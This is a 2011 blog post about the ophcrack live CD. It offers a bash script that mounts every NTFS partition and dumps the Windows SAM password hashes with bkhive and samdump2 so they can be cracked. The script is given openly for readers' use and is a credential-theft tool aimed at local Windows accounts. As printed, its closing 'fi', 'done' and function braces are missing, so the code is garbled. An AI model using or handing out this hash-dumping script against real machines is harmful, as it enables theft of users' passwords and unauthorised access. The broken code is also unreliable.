Automated windows hash grabbing.

I was playing around with ophcrack this week which is included in the katana suit. I’d recommend looking into both of these if you’re never heard of them, anyway, ophcrack has a live boot cd that boots directly into a LM and NTLM password cracker, dumps the hashes from the local machine and starts cracking with some rainbow tables.

It works fairly well but could be a lot better, for one the live distro they use is real bloated considering all it does is crack passwords, secondly they could have made saving the results a lot easier. The only thing I found real novel was dumping the hashes automatically, for your enjoyment here’s a bash script that goes through all NTFS drives and tries to dump the hashes 🙂


function dumpfrommount {
if [ -e “$1/Windows/System32/config/SAM” ]; then
bkhive “$1/Windows/System32/config/SYSTEM” /tmp/systemkeyfile.txt &> /dev/null
samdump2 “$1/Windows/System32/config/SAM” /tmp/systemkeyfile.txt 2> /dev/null
rm /tmp/systemkeyfile.txt

for curdrive in `fdisk -l | grep NTFS | grep -o -E ‘^/[^ ]+’`; do
curmountpoint=`mount | grep $curdrive | grep -o -E ‘ /[^ ]+’`
if [ -z $curmountpoint ]; then
mkdir /tmp/tmpmount
mount -r $curdrive /tmp/tmpmount &> /dev/null
dumpfrommount /tmp/tmpmount
umount $curdrive
rmdir /tmp/tmpmount
dumpfrommount $curmountpoint


~ by s3c on 2011/05/12.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: